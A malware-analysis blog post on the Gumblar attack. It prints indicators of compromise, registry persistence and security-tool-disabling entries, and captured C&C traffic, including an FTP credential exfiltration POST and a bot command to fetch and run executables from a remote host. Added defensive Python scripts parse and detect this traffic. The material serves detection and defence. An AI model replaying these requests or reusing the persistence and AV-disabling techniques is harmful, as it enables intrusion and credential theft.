Digging a little deeper, we find this site is hosted on 211.95.78.98, which hosts a few other malicious domains as well:

degunter.cn
daratop.cn

Doing a quick search for daratop.cn yields more hostile activity in the form of malware. Honeynet.cz has more information and so does the Malware Domains List.

The registrant of daratop.cn is steven_lucas_2000@yahoo.com; a couple of searches for this email reveal many different attacks that this individual has been involved in.

Example 1
Example 2

In closing, all of these sites are hostile and should be blocked and avoided.


Inside the Massive Gumblar Attack

I first found out about Gumblar a couple of days ago via one of ScanSafe’s blog posts. Responsible for 42% of “all malicious infections found on websites” (Sophos) during a 7 day period, Gumblar (JSRedir-R) has been extremely effective at propagating. Many bloggers have been focusing on the script involved in the attack, not so much on what happens when a client is compromised. I will attempt to cover this portion of the attack in detail.

Summary

Once compromised by the Gumblar / Martuz / Geno attack, victims will have many pieces of malware loaded onto their machines. This malware does the following:

Steals FTP credentials
Sends SPAM
Installs fake antivirus
Hijacks Google search queries
Disables security software

The exploits used are for Adobe Acrobat and Adobe Flash Player.

Some further reading:

unmaskparasites
dynamoo

FTP credential stealing

While observing the bot in my lab, the first thing that indicated the ability to steal credentials was the bot trying to put my network card into promiscuous mode. I then logged into ftp.mozilla.org as anonymous, and sure enough my credentials were exfiltrated in an encoded format.

POST /good/receiver/ftp HTTP/1.1
Host: 78.109.29.114
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

ftp_uri_0=9ObqyMjmQWwGxvOwcOfhoJ%2BClWBtBM2kvnD%2F0qzByfsUN0eauuUxo6GiyNX4&ftp_source_0=xuD7lIGgQw

Doing a little recon, we can see the attacker is using “Capture Manager v1.0″, a purchase which seems to be really paying off for them.


As mentioned earlier, the malware downloads software to sniff network traffic, winpcap. With the network card in promiscuous mode, the attacker can then capture other FTP credentials from machines on the same subnet.

An entry is made in the registry for winpcap: HKLM\SOFTWARE\WinPcap

SPAM

The first time I infected myself with the malware, a SPAM bot was installed that had communication that looked like Pushdo. However the second time I infected myself the malware exhibited different behavior and did not send the same traffic. My firewall still recorded drops on port 25, so the malware authors must be deploying a different SPAM engine now. I have not had a chance to investigate this portion of the attack any further.

Fake Antivirus

As with so many attacks as of late, fake antivirus is also installed on the affected machines. In this case it is “System Security 2009″, screenshots below.


HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SystemSecurity2009

Search Hijacking

The next portion of the attack involves hijacking Google search results. The malware installs a proxy on port 7171 which then redirects searches. When a user searches for something, the malware will send the user to a page of its choosing filled with bogus search results. Here is an example of what you get after clicking a Google search result for “car”.


Sys32dll.exe contains the proxy, for which a firewall bypass rule is added as well. Also note that a rule is added for port 80.

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer: “http=localhost:7171″
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\80:TCP: “80:TCP:*:Enabled:SYS32DLL”
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\7171:TCP: “7171:TCP:*:Enabled:SYS32DLL”

Disable Security Software

In order to keep itself running and make life more difficult for both analysts and users, the malware disables many security and administrative tools by registering the Windows system debugger (ntsd) as their debugger under Image File Execution Options, so each tool is launched under the debugger instead of running normally. Here is an example:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zonealarm.exe\Debugger: “ntsd -d”

And here is a list of all the blocked applications:

a2service.exe
ArcaCheck.exe
arcavir.exe
ashDisp.exe
ashEnhcd.exe
ashServ.exe
ashUpd.exe
aswUpdSv.exe
autoruns.exe
avadmin.exe
avcenter.exe
avcls.exe
avconfig.exe
avconsol.exe
avgnt.exe
avgrssvc.exe
avguard.exe
AvMonitor.exe
avp.com
avp.exe
AVP32.EXE
avscan.exe
avz.exe
avz4.exe
avz_se.exe
bdagent.exe
bdinit.exe
caav.exe
caavguiscan.exe
casecuritycenter.exe
CCenter.exe
ccupdate.exe
cfp.exe
cfpupdat.exe
cmdagent.exe
drwadins.exe
DRWEB32.EXE
drwebupw.exe
ekrn.exe
FAMEH32.EXE
filemon.exe
FPAVServer.exe
fpscan.exe
FPWin.exe
fsav32.exe
fsgk32st.exe
FSMA32.EXE
GFRing3.exe
guardgui.exe
guardxservice.exe
guardxup.exe
HijackThis.exe
KASMain.exe
KASTask.exe
KAV32.exe
KAVDX.exe
KAVPF.exe
KAVPFW.exe
KAVStart.exe
KPFW32.exe
KPFW32X.exe
Navapsvc.exe
Navapw32.exe
navigator.exe
NAVNT.EXE
NAVSTUB.EXE
NAVW32.EXE
NAVWNT.EXE
niu.exe
nod32.exe
nod32krn.exe
Nvcc.exe
OllyDBG.EXE
outpost.exe
preupd.exe
procexp.exe
pskdr.exe
regedit.exe
regmon.exe
RegTool.exe
scan32.exe
SfFnUp.exe
Vba32arkit.exe
vba32ldr.exe
vsserv.exe
Zanda.exe
zapro.exe
Zlh.exe
zonealarm.exe
zoneband.dll

Domains

Since both gumblar.cn and martuz.cn are down as of this writing, I will discuss the secondary domains involved in the attack. These are the domains that actually host the malware and exploits and listen on port 8080 so they may seem offline if you try connecting directly.


These are additional domains involved in the attack:

nua20090515.com - C&C
i-site.ph - binary download
zz-dns.com - additional C&C?
main15052009.com - fake av related?
besthandycap.com
ya.ru
…and many more…

Other Information

Malware startup

1) HKLM\SYSTEM\ControlSet001\Services\VSSMSDTC\ImagePath: “C:\WINDOWS\system32\asferrort.exe srv”
2) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PromoReg: “C:\WINDOWS\Temp\wpv701242765100.exe”
3) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pp: “c:\windows\pp10.exe” (I also saw pp08.exe, so this name is variable)
4) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\12281714: “C:\Documents and Settings\All Users\Application Data\12281714\12281714.exe”
5) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\92291706: “C:\Documents and Settings\All Users\Application Data\92291706\92291706.exe”
6) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysldtray: “c:\windows\ld08.exe”

An additional security provider is also installed in the form of digiwet.dll; I have not investigated this piece of the attack.

HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SecurityProviders: “msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digiwet.dll”

A BHO (browser helper object) is also installed here:

HKLM\SOFTWARE\Classes\CLSID\{31F57AFD-3989-4A5B-A33E-6B6253DF8DD4}\InprocServer32\: “C:\WINDOWS\system32\547372\547372.dll”
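An added triage routine (mine, not the author's tooling) for the Search Hijacking, Disable Security Software and Malware startup sections above: it reads registry change lines in the "key\value: "data"" form used throughout this post and flags the Gumblar patterns described there: IFEO Debugger entries, numeric-named autoruns under All Users\Application Data, a browser proxy pointed at a local port, firewall exceptions, an unfamiliar security provider, and in-process COM servers. The baseline provider list is assumed to be the Windows XP default set; the sample dump is copied from the keys shown in this post.

```python
import re

# One line per registry change in the "<key path>\<value name>: "<data>"" form used in
# this post; an optional "N) " numbering prefix is tolerated, straight or curly quotes parse.
LINE_RE = re.compile(r'^(?:\d+\)\s*)?(?P<key>HK[A-Z]+\\.+?): ["“](?P<data>.*)["”]\s*$')

# Assumed Windows XP default SSP list; anything beyond it is reported.
BASELINE_PROVIDERS = {"msapsspc.dll", "schannel.dll", "digest.dll", "msnsspc.dll"}

# Constructed sample dump, copied from the keys shown in this post.
SAMPLE_DUMP = r"""
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PromoReg: "C:\WINDOWS\sever.exe"
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\18888124: "C:\Documents and Settings\All Users\Application Data\18888124\18888124.exe"
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer: "http=localhost:7171"
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\7171:TCP: "7171:TCP:*:Enabled:SYS32DLL"
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zonealarm.exe\Debugger: "ntsd -d"
1) HKLM\SYSTEM\ControlSet001\Services\VSSMSDTC\ImagePath: "C:\WINDOWS\system32\asferrort.exe srv"
HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SecurityProviders: "msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digiwet.dll"
HKLM\SOFTWARE\Classes\CLSID\{31F57AFD-3989-4A5B-A33E-6B6253DF8DD4}\InprocServer32\: "C:\WINDOWS\system32\547372\547372.dll"
"""


def classify(key, data):
    """Return (severity, description) findings for one registry value."""
    k = key.lower()
    findings = []
    if "\\image file execution options\\" in k and k.endswith("\\debugger"):
        # The named program is started under the debugger instead of running normally.
        target = key.split("\\")[-2]
        findings.append(("high", f"IFEO debugger hijack: {target} -> {data}"))
    if "\\currentversion\\run\\" in k:
        if re.search(r"\\application data\\(\d+)\\\1\.exe$", data, re.I):
            findings.append(("high", f"numeric-named autorun under All Users (fake AV pattern): {data}"))
        else:
            findings.append(("medium", f"autorun added: {data}"))
    if k.endswith("\\internet settings\\proxyserver") and re.search(r"(localhost|127\.0\.0\.1):\d+", data, re.I):
        findings.append(("high", f"browser proxy pointed at a local port: {data}"))
    if "\\firewallpolicy\\" in k and "\\globallyopenports\\list\\" in k:
        findings.append(("medium", f"firewall exception added: {data}"))
    if k.endswith("\\securityproviders\\securityproviders"):
        extra = [p.strip() for p in data.split(",") if p.strip().lower() not in BASELINE_PROVIDERS]
        if extra:
            findings.append(("high", "unfamiliar security provider(s): " + ", ".join(extra)))
    if "\\inprocserver32" in k:
        findings.append(("medium", f"in-process COM server registered: {data}"))
    if "\\services\\" in k and k.endswith("\\imagepath"):
        findings.append(("medium", f"service image path set: {data}"))
    return findings


def scan(dump):
    """Run classify() over every parseable line of a dump; returns a list of (severity, text)."""
    report = []
    for raw in dump.splitlines():
        m = LINE_RE.match(raw.strip())
        if m:
            report.extend(classify(m.group("key"), m.group("data")))
    return report


if __name__ == "__main__":
    for severity, text in scan(SAMPLE_DUMP):
        print(f"[{severity}] {text}")
```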

One of the pieces of malware (ld08.exe) also hooks several APIs.

[image: hooks]

C&C communication

The Magic-Number field in the response below may be a key used to encode further communication in order to hamper analysis. Note also that the ids in the Entity-Info header look like Unix timestamps from May 2009, and the last one (1242765100) reappears in the file name of the PromoReg Run entry, wpv701242765100.exe.

GET /new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=953988293&rnd=981633 HTTP/1.1
Host: 78.109.29.112

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 May 2009 19:58:49 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.1.6
Version: 1
Content-Length: 581632
Entity-Info: 1241292389:50176:2;1241530597:32768:1;1241643870:41984:1;1242216620:28672:2;1242765100:428032:2;
Rnd: 982147
Magic-Number: 1024|1|121:12:234:245:236:103:151:67:93:53:56:150:6:94:36:63:106:66:140:194:113:23:183:92:85:78:68:182:185:205:58:51:217:36:40:198:140:191:10:234:245:66:128:252:160:164:59:10:230:200:205:88:223:132:181:53:210:249:235:140:198:38:191:160:74:231:102:215:167:113:193:156:180:65:152:85:230:211:95:205:155:45:37:123:178:218:176:132:211:156:16:154:194:208:58:13:183:161:228:95:19:166:251:199:232:148:28:206:104:124:155:4:170:193:127:92:155:48:224:111:204:241:10:143:194:69:156:121:231:129:217:250:39:212:194:15:105:223:222:209:92:122:214:6:59:85:98:215:134:67:71:83:53:82:226:247:151:126:113:127:0:74:122:39:31:60:55:136:28:22:90:120:144:48:126:204:134:225:164:12:36:236:95:89:62:65:81:214:192:194:85:193:13:207:232:44:12:32:181:40:54:15:161:199:64:31:148:198:0:57:211:37:38:51:127:100:117:208:59:53:147:144:247:160:96:223:204:108:0:130:149:55:145:54:255:210:86:148:153:87:205:108:124:243:159:252:88:20:204:148:74:96:36:65:0:133:33:205:242:34:79:136:89:225:190:89:179:20:237:77:108:187:185:232:175:89:228:7:110:177:155:185:17:192:251:18:70:29:223:56:63:47:192:153:16:127:243:196:148:224:17:0:155:203:233:74:37:205:82:148:127:238:78:145:174:73:163:244:103:131:45:166:178:238:64:195:110:51:135:2:20:153:2:175:101:235:250:138:185:76:30:57:58:108:202:233:182:110:222:29:241:12:196:164:251:5:103:105:57:239:107:77:136:110:253:237:90:247:120:20:68:150:77:127:3:24:105:186:135:71:216:121:84:156:29:79:162:132:184:219:116:36:40:252:146:37:233:236:29:98:0:97:249:78:225:252:102:74:183:237:146:143:102:231:44:132:54:206:9:239:169:125:19:209:121:166:247:99:146:20:197:147:118:190:225:88:187:72:162:115:54:53:2:157:28:47:33:83:253:42:66:167:167:86:121:33:252:112:133:143:133:75:34:252:9:4:84:197:77:247:56:131:44:59:32:73:106:66:156:104:108:222:15:20:52:136:53:49:249:186:192:126:5:227:122:15:232:207:213:53:198:13:185:242:73:218:59:179:28:216:28:136:182:43:156:235:179:210:28:172:141:220:43:146:192:166:162:168:117:119:222:59:133:151:46:206:113:106:130:142:66:159:23:249:202:180:228:126:134:1:43:19:222:86:166:158:253:73:71:114:193:37:174:70:188:220:21:46:70:152:188:137:55:211:130:2:136:103:128:14:104:171:34:71:2:201:229:255:18:44:114:211:81:32:26:14:253:47:60:67:200:249:205:255:205:79:1:85:182:130:100:31:45:135:102:48:80:76:48:99:121:162:55:203:194:81:217:191:129:22:3:73:16:208:73:222:32:75:51:215:205:152:247:251:31:94:44:112:170:92:211:36:254:10:239:193:91:201:129:221:224:132:38:241:85:112:207:118:188:3:77:137:155:69:133:187:163:178:43:78:14:254:114:13:8:98:206:100:43:79:65:12:212:104:253:42:217:204:160:149:207:238:31:107:51:165:38:214:87:81:36:101:79:151:115:88:249:65:189:37:145:255:49:102:104:46:144:65:250:49:214:202:31:246:53:83:155:91:42:242:172:79:88:252:230:203:85:223:13:19:5:159:18:54:5:123:100:150:189:95:199:147:42:231:138:95:58:37:187:101:24:104:180:112:101:155:60:186:123:74:206:128:233:225:182:239:92:27:133:25:123:77:173:165:52:55:5:111:93:192:213:117:40:137:230:141:37:35:72:160:109:22:33:87:247:216:70:84:243:204:110:111:25:27:20:78:83:25:190:176:218:147:38:2:28:13:144:66:48:217:227:158:239:4:245:231:221:60:60:208:9:170:64:35:198:84:113:25:110:47:202:73:194:240:76:223:254:220:34:46:181:5:205:165:10:195:141:231:0:201:184:9:116:248:44:58:77:158:83:188:206:30:5:145:15:81:113:13:46:147:60:228:153:9:137:163:205:23:138:205:225:67:214:85:59:3:143:136:161:227:69:112:2:74:1:17:156:114:30:202:5:91:174:159:100:56:66:50:79:205:255:49:16:213:134:75:217:22:212:123:250:26:235:252:100:236:14:1:95:44:203:100:135:122:4:236:179:70:30:3:19:30:52:36:243:187:112:205:209:69:72:204:95:51:201:196:32:215:197:127:3:145:228:139:11:232:120:191:46:151:194:66:181:246:103:169:177:215:119:131:28:191:80:123:242:25:63:18:240:4:145:244:149:118:
GET /new/controller.php?action=report&guid=0&rnd=981633&uid=1&entity=1241292389:unique_start;1241530597:unique_start;1241643870:unique_start;1242216620:unique_start;1242765100:unique_start HTTP/1.1
Host: 78.109.29.112

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 May 2009 19:58:56 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.1.6
Content-Length: 0

This next exchange shows the bot receiving its commands for which files to download next. Note that the a=953988293 and l=8174 fields in the POST body are the same bot id (guid) seen in the controller.php request above and the PID echoed back in the first line of the reply.

POST /ld/gen.php HTTP/1.1
Host: nua20090515.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1.2600 Service Pack 2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Content-type: application/x-www-form-urlencoded
Connection: close
Content-Length: 107

f=0&a=953988293&v=08&c=0&s=ld&l=8174&ck=0&c_fb=0&c_ms=0&c_hi=0&c_be=0&c_fr=-1&c_yb=-1&c_tg=0&c_nl=0&c_fu=-1

HTTP/1.1 200 OK
Date: Wed, 20 May 2009 20:37:44 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

9a
#PID=8174
START|http://www.i-site.ph/1/6244.exe
START|http://www.i-site.ph/1/nfr.exe
STARTONCE|http://www.i-site.ph/1/pp.10.exe
WAIT|120
#BLACKLABEL
EXIT
0
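The gen.php reply is a chunked HTTP body whose payload is a small line-oriented command script: `#` lines are comments, the rest are `VERB|ARG`. The decoder below is an added example written for this post, not the bot's code or the author's; it dechunks a byte string constructed from the capture and turns the command list into a download plan. One detail worth knowing: the chunk size `9a` is 154 bytes, which matches the seven body lines exactly only if they are terminated with bare LF rather than CRLF, so the capture on the page is complete and the sample below reproduces it byte for byte. The meanings of START (run every time) versus STARTONCE (run a single time) are my reading of the verb names, not something the capture states.

```python
from urllib.parse import urlparse

# Constructed from the gen.php response above.  Chunk framing uses CRLF; the
# body lines use bare LF, which is what makes the 0x9a (154-byte) chunk size
# add up exactly.
RAW_CHUNKED_BODY = (
    b"9a\r\n"
    b"#PID=8174\n"
    b"START|http://www.i-site.ph/1/6244.exe\n"
    b"START|http://www.i-site.ph/1/nfr.exe\n"
    b"STARTONCE|http://www.i-site.ph/1/pp.10.exe\n"
    b"WAIT|120\n"
    b"#BLACKLABEL\n"
    b"EXIT\n"
    b"\r\n"
    b"0\r\n\r\n"
)


def dechunk(raw):
    """Minimal HTTP/1.1 chunked-body decoder; raises if the framing is off."""
    out, pos = b"", 0
    while True:
        eol = raw.index(b"\r\n", pos)
        size = int(raw[pos:eol].split(b";")[0], 16)   # ignore chunk extensions
        if size == 0:
            return out
        start = eol + 2
        chunk = raw[start:start + size]
        if len(chunk) != size or raw[start + size:start + size + 2] != b"\r\n":
            raise ValueError("truncated chunk or missing CRLF after chunk data")
        out += chunk
        pos = start + size + 2


def parse_commands(body):
    """Command lines are VERB|ARG; '#' lines are comments (PID=, BLACKLABEL)."""
    cmds = []
    for line in body.decode("ascii", "replace").splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("#"):
            cmds.append(("COMMENT", line[1:]))
        else:
            verb, _, arg = line.partition("|")
            cmds.append((verb, arg))
    return cmds


def download_plan(raw):
    """What the bot will do with this reply: which binaries, from where, and
    how long it sleeps before asking again."""
    cmds = parse_commands(dechunk(raw))
    urls = [a for v, a in cmds if v in ("START", "STARTONCE")]
    return {
        "pid": next((int(a[4:]) for v, a in cmds if v == "COMMENT" and a.startswith("PID=")), None),
        "urls": urls,
        "run_once": [a for v, a in cmds if v == "STARTONCE"],
        "wait": next((int(a) for v, a in cmds if v == "WAIT"), None),
        "hosts": sorted({urlparse(u).hostname for u in urls}),
        "exits": any(v == "EXIT" for v, _ in cmds),
    }


if __name__ == "__main__":
    plan = download_plan(RAW_CHUNKED_BODY)
    for key, value in plan.items():
        print(f"{key}: {value}")
```

The `hosts` list is the part that feeds straight into blocking: here it is only www.i-site.ph, which matches the "binary download" role the post assigns to that domain.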

Another GET that appears to be a bot check-in request; note the empty User-Agent header, which is a useful signature in proxy logs. The uid (953988293) and p (8174) values are again the bot id and PID seen in the two exchanges above.

GET /v50/?v=66&s=I&uid=953988293&p=8174&q= HTTP/1.0
Host: 85.13.236.154
User-Agent:

HTTP/1.1 200 OK
Date: Wed, 20 May 2009 20:39:28 GMT
Server: Apache/2.2.10 (Fedora)
X-Powered-By: PHP/5.1.6
Cache-Control: no-cache
Work-Server: 85.13.236.154
Content-Length: 0
Connection: close
Content-Type: text/html
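The three C&C requests in this post share a bot id across three different servers and two of them carry no User-Agent at all, which is what a proxy-log or IDS check should key on. The detector below is an added example, not from the post or the malware: it parses raw request text (the three requests above, constructed as strings, plus one made-up benign request) and reports which known request shape each one matches, whether the User-Agent is empty or missing, and which bot id it carries so the three channels can be tied together. Two heuristics are my assumptions and are marked as such in the code: bot ids are the long numeric guid/uid/a parameters (uid=1 and guid=0 are taken to be counters), and a User-Agent containing a full build number plus service pack, as on the gen.php POST, is treated as odd because a stock IE7 sends only "Windows NT 5.1".

```python
import re

# Request shapes from the capture in this post.
CC_PATTERNS = [
    ("controller.php check-in", re.compile(r"^/new/controller\.php\?action=(bot|report)(&|$)")),
    ("gen.php command fetch", re.compile(r"^/ld/gen\.php$")),
    ("v50 check-in", re.compile(r"^/v50/\?v=\d+&s=\w+&uid=\d+&p=\d+")),
]
# Assumption: the bot id is the long numeric value carried as guid=, a= or uid=;
# small values such as uid=1 or guid=0 are counters, not bot ids.
BOT_ID_PARAMS = ("guid", "uid", "a")
MIN_BOT_ID_DIGITS = 8
# Assumption: a stock IE7 User-Agent says "Windows NT 5.1", not the full build
# and service-pack string seen on the gen.php POST.
ODD_UA_RE = re.compile(r"Windows NT \d+\.\d+\.\d+ Service Pack \d")

# Constructed samples: the three requests quoted above (the controller.php one
# has no User-Agent line in the capture) plus one made-up benign request.
SAMPLE_REQUESTS = [
    "GET /new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=953988293&rnd=981633 HTTP/1.1\n"
    "Host: 78.109.29.112\n",
    "POST /ld/gen.php HTTP/1.1\n"
    "Host: nua20090515.com\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1.2600 Service Pack 2; "
    ".NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\n"
    "Content-type: application/x-www-form-urlencoded\n"
    "\n"
    "f=0&a=953988293&v=08&c=0&s=ld&l=8174&ck=0&c_fb=0&c_ms=0&c_hi=0&c_be=0&c_fr=-1&c_yb=-1&c_tg=0&c_nl=0&c_fu=-1",
    "GET /v50/?v=66&s=I&uid=953988293&p=8174&q= HTTP/1.0\n"
    "Host: 85.13.236.154\n"
    "User-Agent:\n",
    "GET /index.html HTTP/1.1\n"
    "Host: www.example.com\n"
    "User-Agent: Mozilla/5.0\n",
]


def parse_request(raw):
    """Split raw request text into method, target, lower-cased headers and body."""
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body.strip()}


def bot_ids(req):
    """Long numeric guid/uid/a values from the query string or the POST body."""
    query = req["target"].partition("?")[2]
    ids = set()
    for param in "&".join(x for x in (query, req["body"]) if x).split("&"):
        name, _, value = param.partition("=")
        if name in BOT_ID_PARAMS and value.isdigit() and len(value) >= MIN_BOT_ID_DIGITS:
            ids.add(value)
    return ids


def detect(raw):
    req = parse_request(raw)
    alerts = [label for label, pat in CC_PATTERNS if pat.search(req["target"])]
    ua = req["headers"].get("user-agent", "")
    if ua == "":
        alerts.append("empty or missing User-Agent")
    elif ODD_UA_RE.search(ua):
        alerts.append("User-Agent carries full build/service-pack string")
    return {"target": req["target"], "alerts": alerts, "bot_ids": bot_ids(req)}


def correlate(raws):
    """Group the targets seen per bot id, tying the three channels together."""
    by_id = {}
    for raw in raws:
        r = detect(raw)
        for bid in r["bot_ids"]:
            by_id.setdefault(bid, []).append(r["target"])
    return by_id


if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        r = detect(raw)
        print(r["target"][:40], r["alerts"], sorted(r["bot_ids"]))
    print(correlate(SAMPLE_REQUESTS))
```

The empty-User-Agent check is the one to keep: the path patterns go stale as soon as the controller script is renamed, but a Windows HTTP client that sends no User-Agent at all is rare enough on a corporate proxy to be worth a look on its own.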

That’s all the analysis I have time for at the moment; this is a very large attack encompassing many malicious payloads. Hopefully more analysis will follow.
